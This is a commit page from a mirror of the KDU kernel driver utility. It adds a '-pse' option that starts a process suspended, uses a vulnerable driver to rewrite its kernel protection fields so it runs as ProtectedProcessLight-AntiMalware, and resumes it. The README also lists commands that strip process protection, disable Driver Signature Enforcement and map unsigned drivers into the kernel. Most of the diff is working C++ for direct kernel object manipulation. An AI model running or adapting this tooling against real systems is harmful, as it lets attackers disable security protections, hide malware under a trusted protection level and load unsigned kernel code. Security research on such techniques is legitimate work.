Rooba
/
KDU
mirror of https://github.com/hfiref0x/KDU.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #44 from pathtofile/RunCommandPPL 

Added -pse mode to run a program as ProtectedProcessLight-AntiMalware
This commit is contained in:
hfiref0x 2022-12-01 05:49:20 +07:00 committed by GitHub
parent 4990763f7d 31af91a2f5
commit 154faf74e3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 153 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitignore vendored Normal file
View File

@ -0,0 +1,3 @@
Source/**/output
.vs
Source/Hamakaze/shellstager.lst

5
README.md
View File

@ -23,12 +23,14 @@ It features:
###### KDU -diag
###### KDU -prv ProviderID
###### KDU -ps ProcessID
###### KDU -pse Commandline
###### KDU -dse value
###### KDU -map filename
* -list - list currently available providers;
* -diag - run system diagnostic for troubleshooting;
* -prv - optional, select vulnerability driver provider;
* -ps - modify process object of given ProcessID;
* -ps - modify process object of given ProcessID, downgrading any protections;
* -pse - launch program as ProtectedProcessLight-AntiMalware (PPL);
* -dse - write user defined value to the system DSE state flags;
* -map - map driver to the kernel and execute it entry point, this command have dependencies listed below;
* -scv version - optional, select shellcode version, default 1;
@ -44,6 +46,7 @@ Example:
+ kdu -prv 6 -scv 3 -drvn edrv -drvr e3600bl -map c:\install\e3600bl.sys
+ kdu -dse 0
+ kdu -dse 6
+ kdu -pse "C:\Windows\System32\notepad.exe C:\TEMP\words.txt"
Run on Windows 10 20H2*

51
Source/Hamakaze/main.cpp
View File

@ -23,6 +23,7 @@
#define CMD_MAP L"-map"
#define CMD_SCV L"-scv"
#define CMD_PS L"-ps"
#define CMD_PSE L"-pse"
#define CMD_DSE L"-dse"
#define CMD_LIST L"-list"
#define CMD_SI L"-diag"
@ -37,6 +38,7 @@
"kdu -list - list available providers\r\n"\
"kdu -diag - run system diagnostic for troubleshooting\r\n"\
"kdu -prv id - optional, sets provider id to be used with rest of commands, default 0\r\n"\
"kdu -pse cmdline - Launch program as PPL\r\n"\
"kdu -ps pid - disable ProtectedProcess for given pid\r\n"\
"kdu -dse value - write user defined value to the system DSE state flags\r\n"\
"kdu -map filename - map driver to the kernel and execute it entry point, this command have dependencies listed below\r\n"\
@ -46,6 +48,38 @@
#define T_PRNTDEFAULT "%s\r\n"
/*
* KDUProcessPSEObjectSwitch
*
* Purpose:
*
* Handle -pse switch.
*
*/
INT KDUProcessPSEObjectSwitch(
_In_ ULONG HvciEnabled,
_In_ ULONG NtBuildNumber,
_In_ ULONG ProviderId,
_In_ LPWSTR CommandLine
)
{
INT retVal = 0;
KDU_CONTEXT* provContext;
provContext = KDUProviderCreate(ProviderId,
HvciEnabled,
NtBuildNumber,
KDU_SHELLCODE_NONE,
ActionTypeDKOM);
if (provContext) {
retVal = KDURunCommandPPL(provContext, CommandLine);
KDUProviderRelease(provContext);
}
return retVal;
}
/*
* KDUProcessPSObjectSwitch
*
@ -71,7 +105,7 @@ INT KDUProcessPSObjectSwitch(
ActionTypeDKOM);
if (provContext) {
retVal = KDUControlProcess(provContext, ProcessId);
retVal = KDUUnprotectProcess(provContext, ProcessId);
KDUProviderRelease(provContext);
}
@ -429,9 +463,19 @@ INT KDUProcessCommandLine(
}
}
else if (supGetCommandLineOption(CMD_PSE,
TRUE,
szParameter,
sizeof(szParameter) / sizeof(WCHAR),
NULL))
{
retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
NtBuildNumber,
providerId,
szParameter);
}
else
else {
//
// Check if -ps specified.
//
@ -455,6 +499,7 @@ INT KDUProcessCommandLine(
//
printf_s(T_PRNTDEFAULT, T_KDUUSAGE);
}
}
} while (FALSE);

91
Source/Hamakaze/ps.cpp
View File

@ -86,6 +86,85 @@ LPSTR KDUGetProtectionSignerAsString(
return pStr;
}
/*
* KDUControlProcess
*
* Purpose:
*
* Start a Process as PPL-Antimalware
*
*/
BOOL KDURunCommandPPL(
_In_ PKDU_CONTEXT Context,
_In_ LPWSTR CommandLine)
{
BOOL bResult = FALSE;
DWORD dwThreadResumeCount = 0;
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
wprintf_s(L"[+] Creating Process '%s'\r\n", CommandLine);
bResult = CreateProcess(
NULL, // No module name (use command line)
CommandLine, // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
CREATE_SUSPENDED, // Create Process suspended so we can edit
// its protection level prior to starting
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi); // Pointer to PROCESS_INFORMATION structure
if (!bResult) {
printf("[!] Failed to create process: 0x%x\n", GetLastError());
return bResult;
}
printf_s("[+] Created Process with PID %d\r\n", pi.dwProcessId);
bResult = KDUControlProcess(Context, pi.dwProcessId, PsProtectedSignerAntimalware, PsProtectedTypeProtectedLight);
if (!bResult) {
printf("[!] Failed to set process as PPL: 0x%x\n", GetLastError());
return bResult;
}
dwThreadResumeCount = ResumeThread(pi.hThread);
if (dwThreadResumeCount != 1) {
printf("[!] Failed to resume process: %d | 0x%x\n", dwThreadResumeCount, GetLastError());
return bResult;
}
// Wait until child process exits.
WaitForSingleObject(pi.hProcess, INFINITE);
// Close process and thread handles.
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return bResult;
}
/*
* KDUControlProcess
*
* Purpose:
*
* Modify process object to remove PsProtectedProcess access restrictions.
*
*/
BOOL KDUUnprotectProcess(
_In_ PKDU_CONTEXT Context,
_In_ ULONG_PTR ProcessId)
{
return KDUControlProcess(Context, ProcessId, PsProtectedSignerNone, PsProtectedTypeNone);
}
/*
* KDUControlProcess
*
@ -96,7 +175,9 @@ LPSTR KDUGetProtectionSignerAsString(
*/
BOOL KDUControlProcess(
_In_ PKDU_CONTEXT Context,
_In_ ULONG_PTR ProcessId)
_In_ ULONG_PTR ProcessId,
_In_ PS_PROTECTED_SIGNER PsProtectionSigner,
_In_ PS_PROTECTED_TYPE PsProtectionType)
{
BOOL bResult = FALSE;
ULONG Buffer;
@ -194,15 +275,15 @@ BOOL KDUControlProcess(
PsProtection->Type,
pStr);
printf_s("\tPsProtection->Audit: %lu\r\n", PsProtection->Audit);
pStr = KDUGetProtectionSignerAsString(PsProtection->Signer);
printf_s("\tPsProtection->Signer: %lu (%s)\r\n",
PsProtection->Signer,
pStr);
PsProtection->Signer = PsProtectedSignerNone;
PsProtection->Type = PsProtectedTypeNone;
printf_s("\tPsProtection->Audit: %lu\r\n", PsProtection->Audit);
PsProtection->Signer = PsProtectionSigner;
PsProtection->Type = PsProtectionType;
PsProtection->Audit = 0;
bResult = Context->Provider->Callbacks.WriteKernelVM(Context->DeviceHandle,

13
Source/Hamakaze/ps.h
View File

@ -30,6 +30,17 @@
#define EPROCESS_TO_PROTECTION(Object, PsProtectionOffset) ((ULONG_PTR)Object + (ULONG_PTR)PsProtectionOffset)
BOOL KDUControlProcess(
BOOL KDUUnprotectProcess(
_In_ PKDU_CONTEXT Context,
_In_ ULONG_PTR ProcessId);
BOOL KDURunCommandPPL(
_In_ PKDU_CONTEXT Context,
_In_ LPWSTR CommandLine);
BOOL KDUControlProcess(
_In_ PKDU_CONTEXT Context,
_In_ ULONG_PTR ProcessId,
_In_ PS_PROTECTED_SIGNER PsProtectionSigner,
_In_ PS_PROTECTED_TYPE PsProtectionType);